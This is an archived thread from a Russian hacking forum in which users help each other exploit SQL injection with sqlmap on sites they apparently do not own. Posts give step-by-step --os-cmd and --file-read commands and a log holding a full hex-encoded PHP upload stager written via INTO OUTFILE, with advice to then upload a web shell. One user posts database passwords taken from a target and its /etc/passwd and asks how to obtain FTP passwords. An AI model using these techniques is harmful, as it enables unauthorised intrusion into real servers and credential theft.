RDot

RDot (https://rdot.org/forum/index.php)
-   Оффтоп/Offtopic (https://rdot.org/forum/forumdisplay.php?f=12)
-   -   sqlmap пару вопросов (https://rdot.org/forum/showthread.php?t=1969)

Shadowfolder 04.02.2012 14:18

а я в tmp и не заливаю, как ты видишь у меня другой путь до эвил файла

snake 04.02.2012 16:00

>
Цитата:

а когда в /tmp/ заливаешь,такой ошибки нет?И файл потом читается через ридфайл?
<
Цитата:

а я в tmp и не заливаю, как ты видишь у меня другой путь до эвил файла
позволю себе повториться
http://joyreactor.ru/pics/post/%D0%8...1%8C-35339.jpg
================================================== =============
Режим "не убий" включен:

ТС,попробуй залить файл 777.txt,в котором будет слово popong в директорию /tmp через sqlmap и посмотри,выведет ли sqlmap ошибку.А потом попробуй прочесть этот файл(/tmp/777.txt) через sqlmap.Выложи сюда результаты.
хух.

dumb 04.02.2012 18:54

Путь до сайта есть?! Хоть какая нибудь ошибка инклуда??? /var/user/site/www/includes/module/qwerty.php

тогда найди в хтмл-исходниках папку которая разрешена для записи (к примеру с картинками. или с аватарами. или cache форума/блога) и тогда

python sqlmap.py -u "http://qwe" --os-cmd "pwd" -v 3

1) потребуется ввести путь до веб-сервера (ты вводишь путь до папки с 777) /var/user/site/www/forum/cache/
2) далее потребуется ввести путь папки разрешенной на запись (ты вводишь тот же путь до папки с 777) /var/user/site/www/forum/cache/
т.к. стоит -v 3 то ты будешь видеть некоторый лог sqlmap. В частоности попытка загрузки 200-250 байтной формы загрузки. Лог примерно будет выглядеть вот так:
Код:

[20:52:15] [PAYLOAD] 36' LIMIT 1 INTO OUTFILE '/var/user/site/www/forum/cache/tmpuybpt.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a -- AND 'ZIsE'='ZIsE
ты пробуешь
site.ru/forum/cache/tmpuybpt.php

собстенно путь с файлом я в коде выделил - так вот если запись произошла, то введи урл этого файла - и в самом низу увидишь форму загрузки(то есть запись возможна!)...через нее уже и закинь свой 65КБ шелл

Shadowfolder 04.02.2012 19:46

с заливкой в temp тоже такая ошибка =( [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
dumb, не...там нельзя ничего загружать, даже аватарку.это не не форум и не блог, а просто сайт.
у меня вот, что выводит на странице если перейти с www.site.com/com/news.php?catid=123 на www.site.com/com/news.php
Код:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /srv/www/htdocs/com/news.php on line 222
бродя по сайту и скачивая различные файлы, я нашёл пассы к mysql

PHP код:

// setup database connection
//DB Connection Parameters
$db_server="localhost";
$db_name="userq";
$db_user="userq";
$db_passwd="12345"

есть один пхп ipconfig
PHP код:

$host "192.168.0.118";
$path "/";
$port "81";
$prot "http";


$mysql_host "localhost";
$mysql_user "root";
$mysql_pass "12345";
$mysql_database "dabase01"

пробовал подключится через mysql,sqlyog на айпи сайта и порт 3306 не вышло =/
может как то можно узнать путь до файлов через etc/passwd что даст хоть какие то конфигурационные файлы, например пароли фтп...? :help:


Код:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
mysql:x:60:102:MySQL database admin:/var/lib/mysql:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
ntp:x:74:65534:NTP daemon:/var/lib/ntp:/bin/false
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:101:103:User for haldaemon:/var/run/hal:/bin/false
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
supportleute:x:1000:100:supportleute:/home/supportleute:/bin/bash
htmlschieber:x:1001:100:Web FTP Benutzer:/srv/www/htdocs:/bin/bash


dumb 04.02.2012 19:54

в /tmp так же заливай как я тебе описал!
--file-write --file-desct хреново работают! я их некогда не юзал!

Пробуй так:
1) sqlmap.py -u "site" --os-cmd 'pwd' -v 3
2) укажешь 2 раза в качестве путей папку /tmp/ (именно так, с первым и последнем слешами!)
3) глянешь лог
Код:

[20:52:15] [PAYLOAD] 36' LIMIT 1 INTO OUTFILE '/tmp/tmpuybpt.php' LINES ......
4) sqlmap.py -u "site" --file-read "/tmp/tmpuybpt.php"
5) и если файл /tmp/tmpuybpt.php скачался - то в tmp запись точно есть!

или скинь ты урл - если нет ни блога, ни форума, никаких загрузок - какой-нить одностраничник пхп-шный?!

Shadowfolder 04.02.2012 20:37

в tmp ничего не качает.
но в других например /srv/www/htdocs/com/jek.php /srv/www/htdocs/com/admin/strukture.php их прекрасно качает, но запись туда никак не выходит

Lostnull 04.02.2012 21:10

Попытаюсь объяснить логику, как подобрать врайтабельную диру.
при ошибке Can't create/write to file '/bla/bla' (Errcode: 13), означает папка не врайтабельна перебираем, все известные папки и пробуем.
при ошибке Can't create/write to file '/bla/bla' (Errcode: 17), означает запись в файл, который существует, пробуем другое название файла (шелла).
Это все под ситуацию руками, как в sqlmap я не знаю даже, что сказать.

snake 04.02.2012 22:16

беда...
Цитата:

"с заливкой в temp тоже такая ошибка =( [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path"
http://sqlmap.sourceforge.net/images/gpl.png

vityab77 05.02.2012 22:40

Привет!

У меня другая проблема с ключами --os-cmd и --os-shell

sqlmap>sqlmap.py -u "http://sub.site.ru/file.php?cid=2" --os-cmd cid -v 3
два раза указываю путь до папки temp(777) /home/webmaster/www/site.ru/htdocs/tmp/

Получаю

23:28:13] [PAYLOAD] 2 LIMIT 1 INTO OUTFILE '/home/webmaster/www/site.ru/htd
ocs/tmp/tmpusrfo.php' LINES TERMINATED BY 0x3c3f706e.....0a --
[23:28:14] [DEBUG] got HTTP error code: 404 (Not Found)
[23:28:14] [WARNING] unable to upload the file stager on '/home/webmaster/www/site.ru/htdocs/tmp'


C --os-shell такая же байда...

Как быть, подскажите, плииииииииииз!

madnet 06.02.2012 10:21

Цитата:

Сообщение от vityab77 (Сообщение 23582)
Как быть, подскажите, плииииииииииз!

Похоже не хватает прав на запись в папку.
Проверь есть ли в принципе права на запись, если да, ищи папку с правами, доступную с веба


Часовой пояс GMT +3, время: 08:26.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot